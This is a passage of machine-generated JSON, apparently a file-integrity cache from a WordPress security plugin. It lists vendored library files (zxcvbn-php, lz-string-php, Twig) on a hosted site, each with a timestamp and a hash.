\/lib\\/vendor\\/bjeavons\\/zxcvbn-php\\/src\\/Matchers\\/ranked_frequency_lists.json\":{\"d\":1567917024,\"h\":\"baadb2519f0bf0112714f7c1fbb4b180\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/bjeavons\\/zxcvbn-php\\/src\\/Scorer.php\":{\"d\":1567917024,\"h\":\"aeb09dd52774511ea417b95a2dc70d55\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/bjeavons\\/zxcvbn-php\\/src\\/Searcher.php\":{\"d\":1567917024,\"h\":\"70c7bcb27e14781648e9aeb406c685d7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/bjeavons\\/zxcvbn-php\\/src\\/Matcher.php\":{\"d\":1567917024,\"h\":\"752447f79916600ff526dce65d3e16d0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/bjeavons\\/zxcvbn-php\\/src\\/ScorerInterface.php\":{\"d\":1567917024,\"h\":\"93bcb2946befa2eeed88a251f03631cc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/bjeavons\\/zxcvbn-php\\/src\\/Zxcvbn.php\":{\"d\":1567917024,\"h\":\"dfc3b5f0beff96c47e5009ecb5aafe66\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/nullpunkt\\/lz-string-php\\/src\\/LZCompressor\\/LZContext.php\":{\"d\":1567917024,\"h\":\"2d9437eb61deb5d99ecb072b3a9ea41e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/nullpunkt\\/lz-string-php\\/src\\/LZCompressor\\/LZData.php\":{\"d\":1567917024,\"h\":\"838912f0a780ab3596f01e6cc7e9404c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/nullpunkt\\/lz-string-php\\/src\\/LZCompressor\\/LZUtil16.php\":{\"d\":1567917024,\"h\":\"2b9b840ad7164cfb57c20bebd882b05a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/nullpunkt\\/lz-string-php\\/src\\/LZCompressor\\/LZString.php\":{\"d\":1567917024,\"h\":\"2e856f43350b3871748a00d0c7ded8ba\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/nullpunkt\\/lz-string-php\\/src\\/LZCompressor\\/LZUtil.php\":{\"d\":1567917024,\"h\":\"351c03eeab08e1dd499f90c763cd9f4e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/nullpunkt\\/lz-string-php\\/src\\/LZCompressor\\/LZReverseDictionary.php\":{\"d\":1567917024,\"h\":\"16ec3b2784a335b740e36a1d50c3a721\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Profiler\\/NodeVisitor\\/Profiler.php\":{\"d\":1567917024,\"h\":\"1ce8071a411924db93550334b8e1d085\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Profiler\\/Node\\/LeaveProfile.php\":{\"d\":1567917024,\"h\":\"680a4932ed3f03b6e1de4b036bc63d12\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Profiler\\/Node\\/EnterProfile.php\":{\"d\":1567917024,\"h\":\"885e5d61024db413d0e3f2f12db6ba73\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Profiler\\/Dumper\\/Text.php\":{\"d\":1567917024,\"h\":\"d9b5f30f385d94b04e3084322d308765\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Profiler\\/Dumper\\/Base.php\":{\"d\":1567917024,\"h\":\"25dbf92c3b4a724b4baa515ff35cffdf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Profiler\\/Dumper\\/Blackfire.php\":{\"d\":1567917024,\"h\":\"de55c6d77ab92900639af3db0720e735\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Profiler\\/Dumper\\/Html.php\":{\"d\":1567917024,\"h\":\"0b965d47fd5d38bc78d8d2543c9a1d6e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Profiler\\/Profile.php\":{\"d\":1567917024,\"h\":\"138ad25c5ab391aab4b316096cd57deb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Extension\\/Optimizer.php\":{\"d\":1567917024,\"h\":\"8be7d45230ef827595644df29173f352\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Extension\\/GlobalsInterface.php\":{\"d\":1567917024,\"h\":\"88cc9e31a42c9b0483a98557e6acee94\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Extension\\/Core.php\":{\"d\":1567917024,\"h\":\"688edb5b040795ffc1c649949b9020e4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Extension\\/Staging.php\":{\"d\":1567917024,\"h\":\"35df3645402559babb0101c51cbc1977\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Extension\\/Profiler.php\":{\"d\":1567917024,\"h\":\"f1fc3dd099f3f9abda52047475a17e06\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Extension\\/Debug.php\":{\"d\":1567917024,\"h\":\"20a45cf8947048e4df447cac84670ad7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Extension\\/InitRuntimeInterface.php\":{\"d\":1567917024,\"h\":\"ba7437ba97d953923ef1e185d643f136\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Extension\\/Sandbox.php\":{\"d\":1567917024,\"h\":\"555caff70bee91ccdbf25284843bb50f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Extension\\/StringLoader.php\":{\"d\":1567917024,\"h\":\"d7ad54d0cdd88eed621935468748f76a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Extension\\/Escaper.php\":{\"d\":1567917024,\"h\":\"f5bda38342085f42bf0c409a480a4916\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Error\\/Runtime.php\":{\"d\":1567917024,\"h\":\"0c5e927235bf5d8a0f208f4de1c9c38a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Error\\/Loader.php\":{\"d\":1567917024,\"h\":\"eb99e644d8d69985551f57392d40de2c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Error\\/Syntax.php\":{\"d\":1567917024,\"h\":\"caf5f775a5d61062126041b079c747ab\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/NodeVisitor\\/Optimizer.php\":{\"d\":1567917024,\"h\":\"044d68e2b7f74a08fba1b5440d7c7fa9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/NodeVisitor\\/Sandbox.php\":{\"d\":1567917024,\"h\":\"14d6553aaf462a57822a6cfd945bea52\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/NodeVisitor\\/Escaper.php\":{\"d\":1567917024,\"h\":\"18395988a9e87b16ba82d4a371085067\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/NodeVisitor\\/SafeAnalysis.php\":{\"d\":1567917024,\"h\":\"25cb96407499dd198e2a29890823a4ff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Loader\\/Array.php\":{\"d\":1567917024,\"h\":\"d74371345bd83298f7a3bda6a33d12fc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Loader\\/Chain.php\":{\"d\":1567917024,\"h\":\"f054bbbb376b6222645132a4104bde38\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Loader\\/String.php\":{\"d\":1567917024,\"h\":\"13f5ccb47bba6bf7c9d68b3ae390cc73\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Loader\\/Filesystem.php\":{\"d\":1567917024,\"h\":\"c1d01790d034d65d53df3095be33a3d3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Filter\\/Function.php\":{\"d\":1567917024,\"h\":\"c1d586918f181931620ae18a9aca6405\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Filter\\/Node.php\":{\"d\":1567917024,\"h\":\"e6e9fe4cb145b15c0111ec7700814bc3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Filter\\/Method.php\":{\"d\":1567917024,\"h\":\"1b9bbcdccd7b605ea1b99a64fc941366\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/AutoEscape.php\":{\"d\":1567917024,\"h\":\"5bc7d481acf4dd38985c162ab4cae027\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/Flush.php\":{\"d\":1567917024,\"h\":\"a239d8a52f738bfc5c18e3011cb7b2fc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/Embed.php\":{\"d\":1567917024,\"h\":\"1c313a3c27b20a3630982a84c5b19988\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/If.php\":{\"d\":1567917024,\"h\":\"0270a02fbe4ea7e03b89f58974012d15\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/Import.php\":{\"d\":1567917024,\"h\":\"f2ccc63d6071dd3731f846fc0b654bcb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/With.php\":{\"d\":1567917024,\"h\":\"28a7098fc100768007970b2041682280\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/For.php\":{\"d\":1567917024,\"h\":\"f663d48c14cc064537cc1f4ea4cba112\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/Extends.php\":{\"d\":1567917024,\"h\":\"d8cf415bbca37de06b67154c5430cea8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/Block.php\":{\"d\":1567917024,\"h\":\"2cc395683206cb660f3db54d6b87fecb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/Include.php\":{\"d\":1567917024,\"h\":\"cf774d3b6c9eadd7711fa2df720f7a34\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/Deprecated.php\":{\"d\":1567917024,\"h\":\"6f9be7f865b86fd55a14b188d2b61f5d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/Spaceless.php\":{\"d\":1567917024,\"h\":\"b773efd8e7494d6ff2b138c7d8ac472a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/Use.php\":{\"d\":1567917024,\"h\":\"fd71c20b76449c6efa228a4a67b44290\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/From.php\":{\"d\":1567917024,\"h\":\"7004cf5adb5746b3d47fe329fb679e61\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/Do.php\":{\"d\":1567917024,\"h\":\"a024ef320e3269eadfdd1e2b5dc05fa4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/Set.php\":{\"d\":1567917024,\"h\":\"be1b06306361964abb2660eccf3f3156\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/Macro.php\":{\"d\":1567917024,\"h\":\"16ab3b0ea57429059dcc3cc76d28edff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/Sandbox.php\":{\"d\":1567917024,\"h\":\"34f1d8640aa365cc0896449d04ab2ca8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser\\/Filter.php\":{\"d\":1567917024,\"h\":\"68da51661238d0198f0ce9977898e4d6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Unary\\/Not.php\":{\"d\":1567917024,\"h\":\"82b2f2f30567e3189d54c03c9b4f1ca4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Unary\\/Pos.php\":{\"d\":1567917024,\"h\":\"d1e1bd8bb4e790fd89d212607c6214f0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Unary\\/Neg.php\":{\"d\":1567917024,\"h\":\"29417f636626e6afe122482bd58f77c6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Filter\\/Default.php\":{\"d\":1567917024,\"h\":\"d0c94f835d7aa723b332cde44dd4c911\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/Power.php\":{\"d\":1567917024,\"h\":\"2ab4af71cc11116201a8c2f85a109f5b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/BitwiseXor.php\":{\"d\":1567917024,\"h\":\"49bb447d9e19c4ffe3febf89bd425896\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/Mod.php\":{\"d\":1567917024,\"h\":\"e288666b50d25c9ca715e28e7efe2246\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/Matches.php\":{\"d\":1567917024,\"h\":\"08054e7515875543c026e70a260503d2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/GreaterEqual.php\":{\"d\":1567917024,\"h\":\"ae3ba349dcf1cb2f7a4b5b206703b480\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/Div.php\":{\"d\":1567917024,\"h\":\"5fe25024048cf2f6f40ef1201c482033\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/EndsWith.php\":{\"d\":1567917024,\"h\":\"02f14987dc37f3695153f6b6d05280b8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/Equal.php\":{\"d\":1567917024,\"h\":\"3911fba4609bf376ed8cf8ab7cbb783e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/FloorDiv.php\":{\"d\":1567917024,\"h\":\"f61f1ed73ffa40b38f9cca63a20cb587\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/Range.php\":{\"d\":1567917024,\"h\":\"cb87841e24a810cf136c6b406a115974\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/Greater.php\":{\"d\":1567917024,\"h\":\"631726763384ac53411e7a8ab0379be6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/NotIn.php\":{\"d\":1567917024,\"h\":\"a42e3600f6ee4b9015146f146407de1a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/NotEqual.php\":{\"d\":1567917024,\"h\":\"dee985d04916ec39044cc3208cc3ff27\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/Mul.php\":{\"d\":1567917024,\"h\":\"bf16aa555475333ead541693f891f31f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/Add.php\":{\"d\":1567917024,\"h\":\"b058fc597486fcc70186a058cbe8008c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/BitwiseOr.php\":{\"d\":1567917024,\"h\":\"740b30dafbbd84abb3c4bf84237bbff1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/Less.php\":{\"d\":1567917024,\"h\":\"d916b824e012ed7d252a5492d9fea98c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/Sub.php\":{\"d\":1567917024,\"h\":\"37a6c0d27da41f67c71d37c9522fc3ab\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/BitwiseAnd.php\":{\"d\":1567917024,\"h\":\"6ab46e39a69bf3dfd478f682b8e72119\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/And.php\":{\"d\":1567917024,\"h\":\"8026dc07f391b027960a24f0028bf4e0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/StartsWith.php\":{\"d\":1567917024,\"h\":\"c96dc2e1b4a97f56d40c7017242dd3a8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/LessEqual.php\":{\"d\":1567917024,\"h\":\"e4bd5c0f836e5287ec2dff90d0134c97\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/Concat.php\":{\"d\":1567917024,\"h\":\"297075c07489ad267ac9e036252de819\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/Or.php\":{\"d\":1567917024,\"h\":\"0098bfbf0fcfcb1dcf7c377e106a3535\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary\\/In.php\":{\"d\":1567917024,\"h\":\"aad02a9dcb4a9b961a14cfd9a395840c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Test\\/Odd.php\":{\"d\":1567917024,\"h\":\"ddf5b605c4e2a73aeb733db9a94b2ec8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Test\\/Sameas.php\":{\"d\":1567917024,\"h\":\"0841b13bf17f7b63e8bb3035ab853d49\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Test\\/Constant.php\":{\"d\":1567917024,\"h\":\"38fc779e9c5980ba7f94a2849dd5324f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Test\\/Even.php\":{\"d\":1567917024,\"h\":\"a9150247da6362e0a59803119ef8a957\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Test\\/Divisibleby.php\":{\"d\":1567917024,\"h\":\"7be826a6a6075075f25093008418431e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Test\\/Defined.php\":{\"d\":1567917024,\"h\":\"cd17f8493b63f5b89dfe547596ce71f4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Test\\/Null.php\":{\"d\":1567917024,\"h\":\"f7ba0d4e9fea1f9f0901d57a35adf22a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Conditional.php\":{\"d\":1567917024,\"h\":\"1c85c9566478e9454b836df8afdb49ca\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Function.php\":{\"d\":1567917024,\"h\":\"40e182f31e72a824417ec353538b0f5b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Test.php\":{\"d\":1567917024,\"h\":\"2f251e2ec130563384764b4728f924c1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Call.php\"